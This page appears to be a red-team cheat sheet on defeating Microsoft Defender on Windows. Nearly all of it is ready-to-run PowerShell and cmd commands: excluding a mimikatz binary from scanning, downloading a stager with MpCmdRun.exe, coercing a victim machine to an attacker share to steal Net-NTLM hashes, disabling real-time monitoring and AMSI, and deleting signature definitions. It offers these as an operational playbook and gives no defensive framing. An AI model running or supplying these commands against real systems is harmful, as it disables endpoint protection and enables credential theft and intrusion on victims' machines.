Comment on page


Microsoft Defender
Add path to exclusions:
PS > $mimi = "C:\Users\snovvcrash\music\mimi\x64\mimikatz.exe"
PS > Add-MpPreference -ExclusionPath $mimi -AttackSurfaceReductionOnlyExclusions $mimi
Download stager without triggering Defender to scan it:
PS > .\MpCmdRun.exe -DownloadFile -Url -Path C:\Users\snovvcrash\music\met.exe
Coerce the victim machine to reach the attacker (to steal Net-NTLM):
Cmd > C:\PROGRA~1\WINDOW~1\MpCmdRun.exe -Scan -ScanType 3 -File '\\\share\file'

Disable Defender

Disable real-time protection (proactive):
PS > Set-MpPreference -DisableRealTimeMonitoring $true
Disable scanning all downloaded files and attachments, disable AMSI (reactive):
PS > Set-MpPreference -DisableIOAVProtection $true
Remove signatures (if Internet connection is present, they will be downloaded again):
PS > cd "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0"
PS > .\MpCmdRun.exe -RemoveDefinitions -All
Cmd > "%PROGRAMFILES%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Lower Token Integrity

Last modified 1yr ago